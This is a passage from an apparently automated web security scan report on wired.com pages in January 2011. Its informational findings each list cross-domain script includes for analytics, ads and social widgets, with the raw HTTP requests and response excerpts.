http://widget.networkedblogs.com/getwidget?bid=204567
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /epicenter/2011/01/amazon-prepares-to-take-on-illinois-in-sales-tax-dispute/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:02:46 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:47:15 GMT
Date: Wed, 12 Jan 2011 15:39:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 85068

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/epicenter/2011/01/amazon-prepares-to-take-on-illinois-in-sales-tax-dispute/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="xrailComponent">
<script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://widget.networkedblogs.com/getwidget?bid=204567"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.28. http://www.wired.com/epicenter/2011/01/metropcs-net-neutrality/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/epicenter/2011/01/metropcs-net-neutrality/

Issue detail

The response dynamically includes the following scripts from other domains:

http://d.yimg.com/ds/badge2.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widget.networkedblogs.com/getwidget?bid=204567
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /epicenter/2011/01/metropcs-net-neutrality/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:04:29 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=462
Expires: Wed, 12 Jan 2011 15:47:01 GMT
Date: Wed, 12 Jan 2011 15:39:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 82374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/epicenter/2011/01/metropcs-net-neutrality/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="xrailComponent">
<script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://widget.networkedblogs.com/getwidget?bid=204567"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.29. http://www.wired.com/gadgetlab/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/gadgetlab/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://wiredgadgetlab.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+39803771688e6b83ac1453e6e9bbbb1e4a5a5d15+1294846745
http://www.google-analytics.com/urchin.js

Request

GET /gadgetlab/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:39:06 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:47:23 GMT
Date: Wed, 12 Jan 2011 15:39:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127381

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://wiredgadgetlab.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+39803771688e6b83ac1453e6e9bbbb1e4a5a5d15+1294846745"></script>
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.30. http://www.wired.com/gadgets/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/gadgets/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /gadgets/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=89
Expires: Wed, 12 Jan 2011 15:37:45 GMT
Date: Wed, 12 Jan 2011 15:36:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70274

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>

<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.31. http://www.wired.com/gamelife/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/gamelife/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /gamelife/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:43:51 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:47:42 GMT
Date: Wed, 12 Jan 2011 15:39:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126317

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="xrailComponent">
<script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.32. http://www.wired.com/gaming/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/gaming/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /gaming/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=114
Expires: Wed, 12 Jan 2011 15:38:18 GMT
Date: Wed, 12 Jan 2011 15:36:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>

<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.33. http://www.wired.com/geekdad/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/geekdad/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://mediaplayer.yahoo.com/js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://static.zemanta.com/readside/loader.js
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /geekdad/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

6.34. http://www.wired.com/geekdad/2011/01/beans-soda-same-difference-a-jelly-belly-experiment/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/geekdad/2011/01/beans-soda-same-difference-a-jelly-belly-experiment/

Issue detail

The response dynamically includes the following scripts from other domains:

http://d.yimg.com/ds/badge2.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /geekdad/2011/01/beans-soda-same-difference-a-jelly-belly-experiment/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 05:28:46 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=447
Expires: Wed, 12 Jan 2011 15:47:21 GMT
Date: Wed, 12 Jan 2011 15:39:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 78974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/geekdad/2011/01/beans-soda-same-difference-a-jelly-belly-experiment/</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="xrailComponent">
<script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.35. http://www.wired.com/inspiredbyyou/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/inspiredbyyou/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /inspiredbyyou/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:38:23 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=466
Expires: Wed, 12 Jan 2011 15:46:09 GMT
Date: Wed, 12 Jan 2011 15:38:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 99556

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.36. http://www.wired.com/js/global.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/js/global.js

Issue detail

The response dynamically includes the following script from another domain:

http://0/

Request

GET /js/global.js HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=600
Expires: Wed, 12 Jan 2011 05:12:44 GMT
Date: Wed, 12 Jan 2011 05:02:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37327

//mobify include
var _mm = "http://m.wired.com/";

(function() {
if(document.domain.indexOf("howto.wired.com")>=0) {
return;
}
if(document.domain.indexOf("wired.com")>=0) {

...[SNIP]...
)
document.addEventListener("DOMContentLoaded", init, false);

// for Internet Explorer
/*@cc_on @*/
/*@if (@_win32)
document.write("<script id=__ie_onload defer src=//0><\/scr"+"ipt>
...[SNIP]...

6.37. http://www.wired.com/magazine/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/magazine/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/magazine/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 11:23:30 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Wed, 12 Jan 2011 15:39:00 GMT
Date: Wed, 12 Jan 2011 15:39:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 81454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.38. http://www.wired.com/magazine/decode/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/magazine/decode/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /magazine/decode/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

6.39. http://www.wired.com/magazine/ipad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/magazine/ipad

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://d.yimg.com/ds/badge.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js
http://www.reddit.com/static/button/button1.js

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:28:46 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:47:04 GMT
Date: Wed, 12 Jan 2011 15:39:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

           <script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

           <script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

           <script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

           <script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://www.reddit.com/static/button/button1.js"></script>
...[SNIP]...
<div id="sb_art_yahoo" class="social">
<script showbranding="0" src="http://d.yimg.com/ds/badge.js" badgetype="text">wired:http://www.wired.com/magazine/ipad/</script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.40. http://www.wired.com/medtech/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/medtech/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /medtech/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=245
Expires: Wed, 12 Jan 2011 15:40:34 GMT
Date: Wed, 12 Jan 2011 15:36:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>

<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.41. http://www.wired.com/nolayout/rssproxy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/nolayout/rssproxy

Issue detail

The response dynamically includes the following scripts from other domains:

http://service.collarity.com/ucs/tracker.js
http://www.google-analytics.com/urchin.js

Request

GET /nolayout/rssproxy HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Length: 24466
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 12 Jan 2011 15:41:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://service.collarity.com/ucs/tracker.js">
</script>
...[SNIP]...

6.42. http://www.wired.com/playbook/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/playbook/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

